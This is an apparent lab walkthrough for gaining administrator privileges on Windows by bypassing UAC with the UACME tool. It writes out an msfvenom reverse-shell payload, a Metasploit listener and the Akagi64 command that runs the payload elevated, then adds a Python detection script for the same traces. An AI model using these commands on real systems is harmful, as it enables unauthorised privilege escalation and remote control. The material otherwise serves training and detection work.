Bypassing UAC using the UACME tool
UACME:
Defeat Windows User Account Control (UAC) and get Administrator privileges.
It abuses the built-in Windows AutoElevate executables.
It has 65+ methods that can be used by the user to bypass UAC depending on the Windows OS version.
Developed by https://twitter.com/hFireF0X
Written mostly in C, with some code in C++.
Get a Windows shell and check if the admin user is a member of the Administrators group.
shell
net localgroup administrators
The admin user is a member of the Administrators group. However, we do not have high privileges yet. We can gain high privileges by bypassing UAC (User Account Control).
We are going to bypass UAC for the admin user with the help of the UACME tool.
Generate a malicious executable using msfvenom and run it on the target machine to gain administrator user privileges.
Note: Please make sure that you replace the “10.10.31.2” local IP address with yours.
Generating malicious executable using msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.44.2 LPORT=4444 -f exe > 'backdoor.exe'
Switch the directory to the user’s temp folder and upload the Akagi64.exe and backdoor.exe executables.
cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .
upload /root/backdoor.exe .
ls
Start another msfconsole and run a multi handler.
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.44.2
set LPORT 4444
exploit
Switch back to the meterpreter and run the Akagi64.exe executable.
Note: Please provide the full path of the backdoor executable.
shell
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
Once we execute the above command we would expect a meterpreter session.

We have successfully gained high privilege access.
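On the detection side, the steps above leave two traces in process-creation telemetry: the Akagi64.exe command line with a method number, and a high-integrity process whose image sits in the user's Temp folder. The following is an added example, not part of the original walkthrough or of the UACME project; it assumes events shaped like Sysmon Event ID 1 fields (Image, CommandLine, IntegrityLevel, User), and the sample events and rule names are constructed for illustration.

```python
import re

# Constructed sample events, shaped like Sysmon Event ID 1 (process creation)
# fields. They are illustrative, not captured from a real host.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\admin\AppData\Local\Temp\Akagi64.exe",
     "CommandLine": r"Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe",
     "IntegrityLevel": "Medium", "User": r"LAB\admin"},
    {"Image": r"C:\Users\admin\AppData\Local\Temp\backdoor.exe",
     "CommandLine": r"C:\Users\admin\AppData\Local\Temp\backdoor.exe",
     "IntegrityLevel": "High", "User": r"LAB\admin"},
    {"Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net localgroup administrators",
     "IntegrityLevel": "Medium", "User": r"LAB\admin"},
    {"Image": r"C:\Program Files\Vendor\updater.exe",
     "CommandLine": r'"C:\Program Files\Vendor\updater.exe" /silent',
     "IntegrityLevel": "High", "User": r"LAB\admin"},
]

# UACME-style invocation: Akagi32/64.exe <method number> [payload path]
AKAGI_CMD = re.compile(r'(?i)\bakagi(32|64)?\.exe"?\s+\d{1,3}(\s|$)')
# Per-user Temp folder: a writable location where elevated binaries rarely belong
USER_TEMP = re.compile(r"(?i)^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\")
ELEVATED = {"high", "system"}

def classify(event):
    """Return the list of (hypothetical) rule names this event matches."""
    hits = []
    if AKAGI_CMD.search(event.get("CommandLine", "")):
        hits.append("uacme_cmdline")
    # Heuristic only: some installers also run elevated from Temp,
    # so treat this as a triage signal, not proof of a UAC bypass.
    if (event.get("IntegrityLevel", "").lower() in ELEVATED
            and USER_TEMP.match(event.get("Image", ""))):
        hits.append("elevated_from_user_temp")
    return hits

def triage(events):
    """Return (image, rules) for every event that matches at least one rule."""
    return [(e["Image"], r) for e in events if (r := classify(e))]

if __name__ == "__main__":
    for image, rules in triage(SAMPLE_EVENTS):
        print(f"ALERT {image}: {', '.join(rules)}")
```

The command-line rule breaks if the binary is renamed, so the integrity-level rule is the more durable of the two signals.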